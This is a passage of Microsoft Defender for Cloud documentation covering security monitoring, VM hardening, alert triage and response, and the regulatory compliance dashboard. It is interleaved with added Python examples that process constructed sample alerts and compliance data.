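    # Default-looking name in a custom resource group: treated as non-default.
    Workspace(f"DefaultWorkspace-{SUB}-WEU", "rg-custom", SUB, frozenset()),
]

if __name__ == "__main__":
    for name, missing in plans_missing_on_workspace(SUB_PLANS, SAMPLE).items():
        print(f"{name}: enable {', '.join(missing)}")
```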


Note


Microsoft makes strong commitments to protect the privacy and security of this 
data. Microsoft adheres to strict compliance and security guidelines—from coding 
to operating a service. For more information about data handling and privacy, read 
Defender for Cloud Data Security. 


Onboard non-Azure resources 


Defender for Cloud can monitor the security posture of your non-Azure computers but 
you need to first onboard these resources. Read Onboard non-Azure computers for 
more information on how to onboard non-Azure resources. 


Ongoing security monitoring 


After initial configuration and application of Defender for Cloud recommendations, the 
next step is considering Defender for Cloud operational processes. 


The Defender for Cloud Overview provides a unified view of security across all your
Azure resources and any non-Azure resources you've connected. This example shows an
environment with many issues to resolve:

[Screenshot: Microsoft Defender for Cloud overview page across subscriptions]

Note


Defender for Cloud doesn't interfere with your normal operational procedures. 
Defender for Cloud passively monitors your deployments and provides 
recommendations based on the security policies you enabled. 


When you first opt in to use Defender for Cloud for your current Azure environment, 
make sure that you review all recommendations, which can be done in the 
Recommendations page. 


Plan to visit the threat intelligence option as part of your daily security operations. There
you can identify security threats against the environment, such as identifying whether a
particular computer is part of a botnet.


Monitoring for new or changed resources 


Most Azure environments are dynamic, with resources regularly being created, spun up 
or down, reconfigured, and changed. Defender for Cloud helps ensure that you have 
visibility into the security state of these new resources. 


When you add new resources (VMs, SQL DBs) to your Azure environment, Defender for 
Cloud automatically discovers these resources and begins to monitor their security, 
including PaaS web roles and worker roles. If Data Collection is enabled in the Security 
Policy, more monitoring capabilities are enabled automatically for your virtual machines. 


You should also regularly monitor existing resources for configuration changes that 
could have created security risks, drift from recommended baselines, and security alerts. 


Hardening access and applications 


As part of your security operations, you should also adopt preventative measures to
restrict access to VMs, and control the applications that are running on VMs. By locking
down inbound traffic to your Azure VMs, you're reducing the exposure to attacks, and at
the same time providing easy access to connect to VMs when needed. Use the just-in-time
VM access feature to harden access to your VMs.


You can use adaptive application controls to limit which applications can run on your 
VMs located in Azure. Among other benefits, adaptive application controls help harden 
your VMs against malware. With the help of machine learning, Defender for Cloud 
analyzes processes running in the VM to help you create allowlist rules. 


Incident response 


Defender for Cloud detects and alerts you to threats as they occur. Organizations should 
monitor for new security alerts and take action as needed to investigate further or 
remediate the attack. For more information on how Defender for Cloud threat 
protection works, read How Defender for Cloud detects and responds to threats. 


Although we can't create your Incident Response plan, we'll use Microsoft Azure Security 
Response in the Cloud lifecycle as the foundation for incident response stages. The 
stages of incident response in the cloud lifecycle are: 


[Diagram: incident response stages in the cloud lifecycle: Detect, Assess, Diagnose, Stabilize]


Note

You can use the National Institute of Standards and Technology (NIST) Computer
Security Incident Handling Guide as a reference to assist you in building your own.


You can use Defender for Cloud alerts during the following stages:

• Detect: identify a suspicious activity in one or more resources.
• Assess: perform the initial assessment to obtain more information about the
suspicious activity.
• Diagnose: use the remediation steps to conduct the technical procedure to
address the issue.


Each Security Alert provides information that can be used to better understand the
nature of the attack and suggest possible mitigations. Some alerts also provide links to
either more information or to other sources of information within Azure. You can use the
information provided for further research and to begin mitigation, and you can also
search security-related data that is stored in your workspace.


The following example shows a suspicious RDP activity taking place: 


[Screenshot: 'Suspicious RDP VM activity' alert (Medium severity): several Remote Desktop login attempts on invalid accounts were detected in the last 24 hours, with remediation steps such as restricting the source IP in the NSG and creating an allow list]


This page shows the details regarding the time that the attack took place, the source 
hostname, the target VM and also gives recommendation steps. In some circumstances, 
the source information of the attack may be empty. Read Missing Source Information in 
Defender for Cloud alerts for more information about this type of behavior. 


Once you identify the compromised system, you can run a workflow automation that 
was previously created. Workflow automations are a collection of procedures that can 
be executed from Defender for Cloud once triggered by an alert. 


Note


Read Managing and responding to security alerts in Defender for Cloud for more 
information on how to use Defender for Cloud capabilities to assist you during your 
Incident Response process. 


Next steps 


In this document, you learned how to plan for Defender for Cloud adoption. Learn more 
about Defender for Cloud: 


• Managing and responding to security alerts in Defender for Cloud
• Monitoring partner solutions with Defender for Cloud - Learn how to monitor the
health status of your partner solutions.
• Defender for Cloud common questions - Find frequently asked questions about
using the service.
• Azure Security blog - Read blog posts about Azure security and compliance.


Protect your Virtual Machines (VMs) 
with Microsoft Defender for Servers 


Article • 06/29/2023


Defender for Servers in Microsoft Defender for Cloud limits your exposure to threats by
using access and application controls to block malicious activity. Just-in-time (JIT) virtual
machine (VM) access reduces your exposure to attacks by enabling you to deny
persistent access to VMs. Instead, you provide controlled and audited access to VMs
only when needed. Adaptive application controls help harden VMs against malware by
controlling which applications can run on your VMs. Defender for Cloud uses machine
learning to analyze the processes running in the VM and helps you apply allowlist rules
using this intelligence.


In this tutorial you'll learn how to: 


✓ Configure a just-in-time VM access policy
✓ Configure an application control policy


Prerequisites 


To step through the features covered in this tutorial, you must have Defender for 
Cloud's enhanced security features enabled. A free trial is available. To upgrade, see 
Enable enhanced protections. 


Manage VM access 


JIT VM access can be used to lock down inbound traffic to your Azure VMs, reducing 
exposure to attacks while providing easy access to connect to VMs when needed. 


Management ports don't need to be open always. They only need to be open while 
you're connected to the VM, for example to perform management or maintenance 
tasks. When just-in-time is enabled, Defender for Cloud uses Network Security Group 
(NSG) rules, which restrict access to management ports so they can't be targeted by 
attackers. 


Follow the guidance in Secure your management ports with just-in-time access. 


Harden VMs against malware 


Adaptive application controls help you define a set of applications that are allowed to 
run on configured resource groups, which among other benefits helps harden your VMs 
against malware. Defender for Cloud uses machine learning to analyze the processes 
running in the VM and helps you apply allowlist rules using this intelligence. 


Follow the guidance in Use adaptive application controls to reduce your machines’ 
attack surfaces. 


Next steps 
In this tutorial, you learned how to limit your exposure to threats by: 


✓ Configuring a just-in-time VM access policy to provide controlled and audited
access to VMs only when needed
✓ Configuring an adaptive application controls policy to control which applications
can run on your VMs


Advance to the next tutorial to learn about responding to security incidents. 


Tutorial: Respond to security incidents 


Tutorial: Triage, investigate, and respond 
to security alerts 


Article • 06/29/2023


Microsoft Defender for Cloud continuously analyzes your hybrid cloud workloads using 
advanced analytics and threat intelligence to alert you about potentially malicious 
activities in your cloud resources. You can also integrate alerts from other security 
products and services into Defender for Cloud. Once an alert is raised, swift action is 
needed to investigate and remediate the potential security issue. 


In this tutorial, you will learn how to: 


✓ Triage security alerts
✓ Investigate a security alert to determine the root cause
✓ Respond to a security alert and mitigate that root cause


If you don't have an Azure subscription, create a free account before you begin.


Prerequisites 


• You'll need a Microsoft Azure subscription. If you don't have an Azure subscription,
you can sign up for a free subscription.
• You must enable Microsoft Defender for Cloud on your Azure subscription.


Triage security alerts 


Defender for Cloud provides a unified view of all security alerts. Security alerts are 
ranked based on the severity of the detected activity. 


Triage your alerts from the Security alerts page: 


[Screenshot: Security alerts page listing active alerts by severity, alert title, affected resource, activity start time, MITRE ATT&CK tactics, and status, with counts of High, Medium and Low alerts]


Use this page to review the active security alerts in your environment to decide which 
alert to investigate first. 


When triaging security alerts, prioritize alerts based on the alert severity by addressing
alerts with higher severity first. Learn more about alert severity in How are alerts
classified?.
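The triage rule above, as an added Python example that is not part of the Microsoft tutorial: the alert list is a constructed sample modelled on the columns of the Security alerts page, and the tie-break within one severity (most recent activity first) is an assumption.

```python
from collections import Counter
from dataclasses import dataclass, replace
from datetime import datetime

# Higher number = investigate first. "Informational" is included for completeness
# (assumption: treated as the lowest priority).
SEVERITY_RANK = {"High": 3, "Medium": 2, "Low": 1, "Informational": 0}


@dataclass(frozen=True)
class Alert:
    alert_id: str
    severity: str
    title: str
    resource: str      # affected resource
    start: datetime    # activity start time
    tactic: str        # MITRE ATT&CK tactic shown in the alerts list
    status: str        # "Active" or "Dismissed"


def triage(alerts):
    """Build the investigation queue: Active alerts only, highest severity first.
    Within one severity the most recent activity comes first (assumption)."""
    active = [a for a in alerts if a.status == "Active"]
    return sorted(active, key=lambda a: (-SEVERITY_RANK.get(a.severity, -1),
                                         -a.start.timestamp()))


def active_alerts_per_resource(alerts):
    """Count Active alerts per affected resource; a resource that keeps raising alerts
    is a good place to start the investigation."""
    return Counter(a.resource for a in alerts if a.status == "Active")


def dismiss(alerts, alert_id):
    """Return a new list with the given alert set to Dismissed (the last step of the
    response procedure). It drops out of triage() but stays available for filtering."""
    return [replace(a, status="Dismissed") if a.alert_id == alert_id else a
            for a in alerts]


# Constructed sample, loosely modelled on the rows of the Security alerts page.
SAMPLE_ALERTS = [
    Alert("a1", "High", "Suspicious process executed", "CH-VictimVM00-Dev",
          datetime(2020, 11, 22, 3, 0), "Credential Access", "Active"),
    Alert("a2", "Medium", "Suspicious authentication activity", "EC2",
          datetime(2020, 11, 22, 5, 0), "Pre-attack", "Active"),
    Alert("a3", "High", "Exposed Kubernetes dashboard detected", "ASC-WORKLOAD-PRO",
          datetime(2020, 11, 20, 0, 0), "Initial Access", "Active"),
    Alert("a4", "Low", "Suspicious process executed", "dockervm-redhat",
          datetime(2020, 11, 21, 3, 0), "Credential Access", "Active"),
    Alert("a5", "High", "Suspicious process executed", "CH-VictimVM00-Dev",
          datetime(2020, 11, 19, 19, 0), "Credential Access", "Dismissed"),
    Alert("a6", "Medium", "Suspicious process executed", "CH-VictimVM00-Dev",
          datetime(2020, 11, 21, 1, 0), "Credential Access", "Active"),
]

if __name__ == "__main__":
    for a in triage(SAMPLE_ALERTS):
        print(f"{a.severity:<7} {a.alert_id} {a.resource:<20} {a.start.isoformat()}")
    print(active_alerts_per_resource(SAMPLE_ALERTS).most_common(1))
```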

Tip


You can connect Microsoft Defender for Cloud to most popular SIEM solutions 
including Microsoft Sentinel and consume the alerts from your tool of choice. Learn 
more in Stream alerts to a SIEM, SOAR, or IT Service Management solution. 


Investigate a security alert 
Once you have selected an alert, you will then be able to investigate it. 
To investigate a security alert: 

1. Select the desired alert. 


2. From the alert overview page, select the resource to investigate first. 


3. Begin your investigation from the left pane, which shows the high-level 
information about the security alert. 


[Screenshot: Security alert pane for a High-severity 'Suspicious process executed' alert on CH-VictimVM00-Dev, showing the alert description, affected resource, MITRE ATT&CK tactic (Credential Access), related entities, and the Alert details and Take action tabs]

This pane shows:

• Alert severity, status, and activity time
• Description that explains the precise activity that was detected
• Affected resources
• Kill chain intent of the activity on the MITRE ATT&CK matrix


4. For more detailed information that can help you investigate the suspicious activity, 
examine the Alert details tab. 


5. When you've reviewed the information on this page, you may have enough to 
proceed with a response. If you need further details: 


• Contact the resource owner to verify whether the detected activity is a false
positive.
• Investigate the raw logs generated by the attacked resource.


Respond to a security alert 


After you've investigated a security alert and understood its scope, you can respond to 
the alert from within Microsoft Defender for Cloud: 


1. Open the Take action tab to see the recommended responses. 


[Screenshot: Take action tab for a Medium-severity 'Suspicious authentication activity' alert on an Azure Arc machine, with the sections Mitigate the threat, Prevent future attacks (top active security recommendations), Trigger automated response, and Suppress similar alerts (preview)]


2. Review the Mitigate the threat section for the manual investigation steps
necessary to mitigate the issue.

3. To harden your resources and prevent future attacks of this kind, remediate the
security recommendations in the Prevent future attacks section.

4. To trigger a logic app with automated response steps, use the Trigger automated
response section.

5. If the detected activity isn't malicious, you can suppress future alerts of this kind
using the Suppress similar alerts section.

6. When you've completed the investigation into the alert and responded in the
appropriate way, change the status to Dismissed.


[Screenshot: alert header with the status drop-down opened, offering Active and Dismissed]


This removes the alert from the main alerts list. You can use the filter from the 
alerts list page to view all alerts with Dismissed status. 


7. We encourage you to provide feedback about the alert to Microsoft:
a. Mark the alert as Useful or Not useful.
b. Select a reason and add a comment.


[Screenshot: 'Was this useful?' feedback form with Yes/No, a reason drop-down, and an additional feedback box]


Tip


We review your feedback to improve our algorithms and provide better 
security alerts. 


Clean up resources 


There's no need to clean up any resources for this tutorial. 


Next steps 


In this tutorial, you learned about Defender for Cloud features to be used when 
responding to a security alert. For related material see: 


• Respond to Microsoft Defender for Key Vault alerts
• Security alerts - a reference guide
• What is Microsoft Defender for Cloud?


Tutorial: Improve your regulatory
compliance

Microsoft Defender for Cloud helps streamline the process for meeting regulatory
compliance requirements, using the regulatory compliance dashboard. Defender for
Cloud continuously assesses your hybrid cloud environment to analyze the risk factors
according to the controls and best practices in the standards that you've applied to your
subscriptions. The dashboard reflects the status of your compliance with these
standards.


When you enable Defender for Cloud on an Azure subscription, the Microsoft cloud
security benchmark is automatically assigned to that subscription. This widely respected
benchmark builds on the controls from the Center for Internet Security (CIS), PCI-DSS
and the National Institute of Standards and Technology (NIST), with a focus on
cloud-centric security.


The regulatory compliance dashboard shows the status of all the assessments within 
your environment for your chosen standards and regulations. As you act on the 
recommendations and reduce risk factors in your environment, your compliance posture 
improves. 


In this tutorial you'll learn how to: 


✓ Evaluate your regulatory compliance using the regulatory compliance dashboard
✓ Check Microsoft's compliance offerings (currently in preview) for Azure, Dynamics
365 and Power Platform products
✓ Improve your compliance posture by taking action on recommendations
✓ Download PDF/CSV reports as well as certification reports of your compliance
status
✓ Set up alerts on changes to your compliance status
✓ Export your compliance data as a continuous stream and as weekly snapshots


If you don't have an Azure subscription, create a free account before you begin.


Prerequisites 
To step through the features covered in this tutorial: 


• Enable enhanced security features. You can enable these for free for 30 days.


• You must be signed in with an account that has reader access to the policy
compliance data. The Reader role for the subscription has access to the policy
compliance data, but the Security Reader role doesn't. At a minimum, you'll need
to have Resource Policy Contributor and Security Admin roles assigned.


Assess your regulatory compliance 


The regulatory compliance dashboard shows your selected compliance standards with 
all their requirements, where supported requirements are mapped to applicable security 
assessments. The status of these assessments reflects your compliance with the 
standard. 


Use the regulatory compliance dashboard to help focus your attention on the gaps in 
compliance with your chosen standards and regulations. This focused view also enables 
you to continuously monitor your compliance over time within dynamic cloud and 
hybrid environments. 


1. Sign in to the Azure portal.
2. Navigate to Defender for Cloud > Regulatory compliance.


The dashboard provides you with an overview of your compliance status and the 
set of supported compliance regulations. You'll see your overall compliance score, 
and the number of passing vs. failing assessments associated with each standard. 


[Screenshot: Regulatory compliance dashboard showing the NIST SP 800 53 R4 standard with control AC-2(7), Role-based Schemes expanded and its Control details link, with numbered callouts for the items listed below]


The following list has a numbered item that matches each location in the image above, 
and describes what is in the image: 


• Select a compliance standard to see a list of all controls for that standard. (1)
• View the subscription(s) that the compliance standard is applied on. (2)
• Select a Control to see more details. Expand the control to view the assessments
associated with the selected control. Select an assessment to view the list of
resources associated and the actions to remediate compliance concerns. (3)
• Select Control details to view Overview, Your Actions and Microsoft Actions tabs.
(4)
• In the Your Actions tab, you can see the automated and manual assessments
associated to the control. (5)
• Automated assessments show the number of failed resources and resource types,
and link you directly to the remediation experience to address those
recommendations. (6)
• The manual assessments can be manually attested, and evidence can be linked to
demonstrate compliance. (7)


Investigate regulatory compliance issues 


You can use the information in the regulatory compliance dashboard to investigate any 
issues that may be affecting your compliance posture. 


To investigate your compliance issues: 
1. Sign in to the Azure portal.
2. Navigate to Defender for Cloud > Regulatory compliance. 
3. Select a regulatory compliance standard. 
4. Select a compliance control to expand it. 


5. Select Control details. 


[Screenshot: regulatory compliance standard tabs (Azure Security Benchmark V3, ISO 27001, PCI DSS 3.2.1, SOC TSP, HIPAA HITRUST, NIST SP 800 53 R4) with NIST SP 800 53 R4 selected and the AC. Access Control family expanded to AC-1, AC-2 and AC-2(1), each with a Control details link]

   • Select Overview to see the specific information about the control you selected.

   • Select Your Actions to see a detailed view of the automated and manual actions you need to take to improve your compliance posture.

   • Select Microsoft Actions to see all the actions Microsoft took to ensure compliance with the selected standard.


6. Under Your Actions, you can select a down arrow to view more details and resolve 
the recommendation for that resource. 


[Screenshot: Control details for AC.2.7 Role-based Schemes (NIST SP 800 53 R4), Your Actions tab. The table lists the actions for this control:

Your Actions | Action Name | Action Type
Automated | Audit usage of custom RBAC rules | Technical
Automated | Service Fabric clusters should only use Azure Active Directory for client authentication | Technical
Automated | SQL servers should have an Azure Active Directory administrator provisioned | Technical]


For more information about how to apply recommendations, see Implementing security recommendations in Microsoft Defender for Cloud.

Note

Assessments run approximately every 12 hours, so you will see the impact on your compliance data only after the next run of the relevant assessment.


Remediate an automated assessment 


The regulatory compliance dashboard has both automated and manual assessments that may need to be remediated. Using the information in the regulatory compliance dashboard, you can improve your compliance posture by resolving recommendations directly within the dashboard.


To remediate an automated assessment:

1. Sign in to the Azure portal.
2. Navigate to Defender for Cloud > Regulatory compliance.
3. Select a regulatory compliance standard.
4. Select a compliance control to expand it.
5. Select any of the failing assessments that appear in the dashboard to view the details for that recommendation. Each recommendation includes a set of remediation steps to resolve the issue.
6. Select a particular resource to view more details and resolve the recommendation for that resource.

   For example, in the Azure CIS 1.1.0 standard, select the recommendation Disk encryption should be applied on virtual machines.


[Screenshot: recommendation details for "Disk encryption should be applied on virtual machines": Severity High, Freshness interval 24 Hours, with collapsible Description and Remediation steps sections. Affected resources: Unhealthy resources (107), Healthy resources (0), Not applicable resources (18); a search box for virtual machines and a list of VM names with their subscription (ASC DEMO).]


7. In this example, when you select Take action from the recommendation details 
page, you arrive in the Azure Virtual Machine pages of the Azure portal, where you 
can enable encryption from the Security tab: 


[Screenshot: Disk settings for virtual machine VM6, reached from the recommendation. Ultra disk: "Ultra disk is available only for Availability Zones in eastus2." Encryption settings: "Azure Disk Encryption (ADE) provides volume encryption for the OS and data disks." Disks to encrypt options: None, OS disk, OS and data disks.]


   For more information about how to apply recommendations, see Implementing security recommendations in Microsoft Defender for Cloud.

8. After you take action to resolve recommendations, you'll see the result in the compliance dashboard report as your compliance score improves.

Note

Assessments run approximately every 12 hours, so you will see the impact on your compliance data only after the next run of the relevant assessment.


Remediate a manual assessment 


The regulatory compliance dashboard has automated and manual assessments that may need to be remediated. Manual assessments are assessments that require input from the customer to remediate them.

To remediate a manual assessment:

1. Sign in to the Azure portal.
2. Navigate to Defender for Cloud > Regulatory compliance.
3. Select a regulatory compliance standard.
4. Select a compliance control to expand it.
5. Under the Manual attestation and evidence section, select an assessment.
6. Select the relevant subscriptions.
7. Select Attest.
8. Enter the relevant information and attach evidence for compliance.
9. Select Save.


Generate compliance status reports and certificates


• To generate a PDF report with a summary of your current compliance status for a particular standard, select Download report.

  The report provides a high-level summary of your compliance status for the selected standard based on Defender for Cloud assessments data. The report's organized according to the controls of that particular standard. The report can be shared with relevant stakeholders, and might provide evidence to internal and external auditors.


[Screenshot: the Regulatory compliance dashboard (showing 2 subscriptions) with the Download report pane open: "Export regulatory standard compliance status report as PDF or CSV formats." Report standard: Azure Security Benchmark. The dashboard tile for Azure Security Benchmark shows 7/37, 19% (7 of 37 passed controls), alongside Lowest compliance regulatory standards (SOC TSP, PCI DSS 3.2.1, NIST SP 800 53 R4) and the standard tabs Azure Security Benchmark V3, ISO 27001, PCI DSS 3.2.1, SOC TSP.]


• To download Azure and Dynamics certification reports for the standards applied to your subscriptions, use the Audit reports option.

  [Screenshot: the Regulatory compliance dashboard toolbar (showing 2 subscriptions): Download report, Manage compliance policies, Open query, Audit reports, Compliance over time workbook.]

  Select the tab for the relevant report types (PCI, SOC, ISO, and others) and use filters to find the specific reports you need:


[Screenshot: the Audit reports pane (showing 1 to 10 of 12 results) with Region, Standard and Industry filters and a search box. Rows list ISO certification and assessment reports for Microsoft Azure, Dynamics 365 and Other Online Services, such as the ISO 27001 and 27701 Certificate (12.18.2020), the ISO 27017 Certificate (12.18.2020), the ISO 27018 Certificate, and the ISO 27001 and 27701 Certificate (8.13.2020), each with a Download link and its Standard (ISO27001, ISO27018, ISO27701, ISO20000-1, ISO22301, ISO27017).]


For example, from the PCI tab you can download a ZIP file containing a digitally 
signed certificate demonstrating Microsoft Azure, Dynamics 365, and Other Online 
Services' compliance with ISO22301 framework, together with the necessary 
collateral to interpret and present the certificate. 


Note

When you download one of these certification reports, you'll be shown the following privacy notice:

By downloading this file, you are giving consent to Microsoft to store the current user and the selected subscriptions at the time of download. This data is used in order to notify you in case of changes or updates to the downloaded audit report. This data is used by Microsoft and the audit firms that produce the certification/reports only when notification is required.


Check compliance offerings status 


The transparency provided by the compliance offerings (currently in preview) allows you to view the certification status for each of the services provided by Microsoft prior to adding your product to the Azure platform.


To check the compliance offerings status:

1. Sign in to the Azure portal.
2. Navigate to Defender for Cloud > Regulatory compliance.
3. Select Compliance offerings.

   [Screenshot: the Regulatory compliance dashboard toolbar: Search, Download report, Manage compliance policies, Open query, Compliance over time workbook, Audit reports, Compliance offerings.]

4. Enter a service in the search bar to view its compliance offering.


[Screenshot: the Compliance Offerings pane. "Compliance Offerings include various types of assurances, including formal certifications and attestations produced by independent third-party audit firms as well as self-assessments produced by Microsoft." Filters: Product (All), Services (All), Industry (All), Compliance Offering (All), and a Download button; below is a grid of services (for example, AI Builder, API Management) against the compliance offerings each one holds.]
Configure frequent exports of your compliance status data


If you want to track your compliance status with other monitoring tools in your 
environment, Defender for Cloud includes an export mechanism to make this 
straightforward. Configure continuous export to send select data to an Azure Event 
Hubs or a Log Analytics workspace. Learn more in continuously export Defender for 
Cloud data. 


Use continuous export to send data to an Azure Event Hubs or a Log Analytics workspace:

• Export all regulatory compliance data in a continuous stream:

  [Screenshot: Settings | Continuous export for the subscription Contoso Infra, Event hub tab. Export enabled: On. Exported data types: Security recommendations, Secure score, Security alerts, and Regulatory compliance (selected standards: Azure-Security-Benchmark, PCI-DSS-3.2.1, ISO-27001, SOC-TSP, UKO-and-UK-NHS). Export frequency: Streaming updates.]


• Export weekly snapshots of your regulatory compliance data:

  [Screenshot: Settings | Continuous export for the subscription Contoso Infra, Event hub tab, with Export frequency set to Snapshots (Preview): "Export weekly snapshot of the data types selected under 'Exported data types'. These supported data types are: overall Secure score, secure score controls, regulatory compliance."]


Tip

You can also manually export reports about a single point in time directly from the regulatory compliance dashboard. Generate these PDF/CSV reports or Azure and Dynamics certification reports using the Download report or Audit reports toolbar options. See Assess your regulatory compliance.
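Once compliance data is flowing into a Log Analytics workspace or an Event Hub, the consumer usually wants the same numbers the dashboard shows: passed controls out of total controls per standard (the "7 of 37 passed controls, 19%" style figure) and the resources behind the failures. The following is an added example, not Microsoft's code, that does this over a constructed, simplified stand-in for exported rows (one row per standard, control, assessment and resource, with a state); the field names are assumptions for this example. It applies the dashboard's rule that a control counts as passing only when all of its assessments pass, and extends it with an ordering for Skipped and Unsupported assessments that is an assumption.

```python
"""Summarise exported regulatory compliance data per standard.

Added example, not Microsoft's code. Continuous export can stream
regulatory compliance data to an Event Hub or a Log Analytics workspace;
the row layout below (standard, control, assessment, resource, state) is a
constructed, simplified stand-in for that exported data, and the field
names are assumptions for this example.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Constructed sample export rows (not real export output).
SAMPLE_ROWS: List[Dict[str, str]] = [
    {"standard": "NIST SP 800 53 R4", "control": "AC-2(1)",
     "assessment": "Audit usage of custom RBAC rules",
     "resource": "sub-contoso", "state": "Passed"},
    {"standard": "NIST SP 800 53 R4", "control": "AC-2(1)",
     "assessment": "SQL servers should have an Azure Active Directory administrator provisioned",
     "resource": "sql-01", "state": "Failed"},
    {"standard": "NIST SP 800 53 R4", "control": "AC-2(7)",
     "assessment": "Audit usage of custom RBAC rules",
     "resource": "sub-contoso", "state": "Passed"},
    {"standard": "NIST SP 800 53 R4", "control": "AC-1",
     "assessment": "Manual attestation: access control policy and procedures",
     "resource": "sub-contoso", "state": "Skipped"},
    {"standard": "PCI DSS 3.2.1", "control": "3.4",
     "assessment": "Disk encryption should be applied on virtual machines",
     "resource": "vm-01", "state": "Failed"},
    {"standard": "PCI DSS 3.2.1", "control": "3.4",
     "assessment": "Disk encryption should be applied on virtual machines",
     "resource": "vm-02", "state": "Passed"},
    {"standard": "PCI DSS 3.2.1", "control": "8.1",
     "assessment": "SQL servers should have an Azure Active Directory administrator provisioned",
     "resource": "sql-01", "state": "Passed"},
]

# Higher rank = less compliant. A single Failed assessment fails the control;
# a control is Passed only when every assessment is Passed (the dashboard's
# "all green" rule). The Skipped/Unsupported ordering is an assumption.
STATE_RANK = {"Passed": 0, "Unsupported": 1, "Skipped": 2, "Failed": 3}


def control_state(assessment_states: Iterable[str]) -> str:
    """Derive a control's state from the states of its assessments."""
    states = list(assessment_states)
    if not states:
        return "Unsupported"
    for s in states:
        if s not in STATE_RANK:
            raise ValueError(f"unknown assessment state: {s!r}")
    return max(states, key=STATE_RANK.__getitem__)


def summarise(rows: Iterable[Dict[str, str]]) -> Dict[str, Tuple[int, int, Dict[str, str]]]:
    """Return {standard: (passed_controls, total_controls, {control: state})}."""
    per_control: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for row in rows:
        per_control[(row["standard"], row["control"])].append(row["state"])
    by_standard: Dict[str, Dict[str, str]] = defaultdict(dict)
    for (standard, control), states in per_control.items():
        by_standard[standard][control] = control_state(states)
    return {
        standard: (sum(1 for s in controls.values() if s == "Passed"), len(controls), controls)
        for standard, controls in by_standard.items()
    }


def score_percent(passed: int, total: int) -> int:
    """Dashboard-style percentage, e.g. 7 of 37 passed controls -> 19."""
    return round(100 * passed / total) if total else 0


def failing_resources(rows: Iterable[Dict[str, str]], standard: str) -> List[str]:
    """Resources with at least one failed assessment under a standard."""
    return sorted({r["resource"] for r in rows
                   if r["standard"] == standard and r["state"] == "Failed"})


if __name__ == "__main__":
    for standard, (passed, total, controls) in summarise(SAMPLE_ROWS).items():
        print(f"{standard}: {passed} of {total} passed controls ({score_percent(passed, total)}%)")
        print("  failing resources:", failing_resources(SAMPLE_ROWS, standard))
```

Because one failing resource fails its assessment and one failing assessment fails its control, the per-resource list is what turns a percentage into a remediation queue; the same grouping works unchanged on a weekly snapshot export, which is the simpler source when you only need the trend.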


Run workflow automations when there are changes to your compliance


Defender for Cloud's workflow automation feature can trigger Logic Apps whenever one 
of your regulatory compliance assessments changes state. 


For example, you might want Defender for Cloud to email a specific user when a 
compliance assessment fails. You'll need to first create the logic app (using Azure Logic 
Apps) and then set up the trigger in a new workflow automation as explained in 
Automate responses to Defender for Cloud triggers. 
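The trigger described above has three parts: the data type (regulatory compliance standards), one compliance standard, and the set of compliance control states that should fire the automation. The following is an added example, not Microsoft's code, that models that trigger and applies it to the difference between two constructed snapshots of control states, producing the fields a notification Logic App would need; the snapshot and payload layouts are assumptions for this example.

```python
"""Decide which compliance state changes would fire a workflow automation.

Added example, not Microsoft's code. It models the trigger the page
describes (data type: regulatory compliance standards, one compliance
standard, a set of compliance control states) and applies it to the
difference between two constructed snapshots of control states, producing
the payload a Logic App action would receive. The snapshot and payload
layouts are assumptions for this example.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional, Tuple

# The control states offered by the trigger configuration.
VALID_STATES = frozenset({"Passed", "Failed", "Skipped", "Unsupported"})

# (standard, control) -> control state
Snapshot = Dict[Tuple[str, str], str]


@dataclass(frozen=True)
class Trigger:
    """Trigger conditions as configured in Add workflow automation."""
    standard: str
    states: FrozenSet[str]

    def __post_init__(self) -> None:
        bad = self.states - VALID_STATES
        if bad:
            raise ValueError(f"unsupported control state(s): {sorted(bad)}")


@dataclass(frozen=True)
class Change:
    standard: str
    control: str
    old_state: Optional[str]   # None when the control is new in this snapshot
    new_state: str


def diff_snapshots(before: Snapshot, after: Snapshot) -> List[Change]:
    """List every control whose state differs between two snapshots."""
    changes = []
    for key in sorted(after):
        old, new = before.get(key), after[key]
        if old != new:
            changes.append(Change(key[0], key[1], old, new))
    return changes


def matching_changes(changes: List[Change], trigger: Trigger) -> List[Change]:
    """A change fires the trigger only if it belongs to the trigger's standard
    and its new state is one of the selected states."""
    return [c for c in changes
            if c.standard == trigger.standard and c.new_state in trigger.states]


def action_payload(change: Change) -> Dict[str, Optional[str]]:
    """Fields a notification action (for example an email Logic App) needs."""
    return {"standard": change.standard, "control": change.control,
            "previousState": change.old_state, "currentState": change.new_state}


# Constructed snapshots (not real export data): yesterday vs. today.
BEFORE: Snapshot = {
    ("Azure-Security-Benchmark", "DP-3"): "Passed",
    ("Azure-Security-Benchmark", "DP-4"): "Failed",
    ("PCI-DSS-3.2.1", "3.4"): "Failed",
}
AFTER: Snapshot = {
    ("Azure-Security-Benchmark", "DP-3"): "Failed",
    ("Azure-Security-Benchmark", "DP-4"): "Failed",
    ("Azure-Security-Benchmark", "DP-5"): "Skipped",
    ("PCI-DSS-3.2.1", "3.4"): "Passed",
}

# Email a user when an Azure Security Benchmark control starts failing.
FAIL_TRIGGER = Trigger("Azure-Security-Benchmark", frozenset({"Failed"}))

if __name__ == "__main__":
    for change in matching_changes(diff_snapshots(BEFORE, AFTER), FAIL_TRIGGER):
        print(action_payload(change))
```

Note that DP-4 is failing in both snapshots and does not appear: the automation fires on a change of state, not on every failing control, so a control that has been failing since before the automation was created will not generate a notification until it changes again.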


[Screenshot: Settings | Workflow automation (showing 63 subscriptions) with the Add workflow automation pane open. Existing automations "test" and "testSecureScorecont..." are Enabled for the ASC DEMO subscription. Trigger conditions: "Choose the trigger conditions that will automatically trigger the configured action." Defender for Cloud data type: Regulatory compliance standards. Compliance standard: Azure-Security-Benchmark. Compliance control state: Passed, Failed (the selectable states are Passed, Failed, Skipped and Unsupported).]


Next steps 


In this tutorial, you learned about using Defender for Cloud's regulatory compliance 
dashboard to: 


✓ View and monitor your compliance posture regarding the standards and regulations that are important to you.

✓ Improve your compliance status by resolving relevant recommendations and watching the compliance score improve.


The regulatory compliance dashboard can greatly simplify the compliance process, and 
significantly cut the time required for gathering compliance evidence for your Azure, 
hybrid, and multicloud environment. 


To learn more, see these related pages: 


• Customize the set of standards in your regulatory compliance dashboard - Learn how to select which standards appear in your regulatory compliance dashboard.

• Managing security recommendations in Defender for Cloud - Learn how to use recommendations in Defender for Cloud to help protect your Azure resources.

• Check out common questions about regulatory compliance.


Customize the set of standards in your regulatory compliance dashboard


Article • 10/10/2023


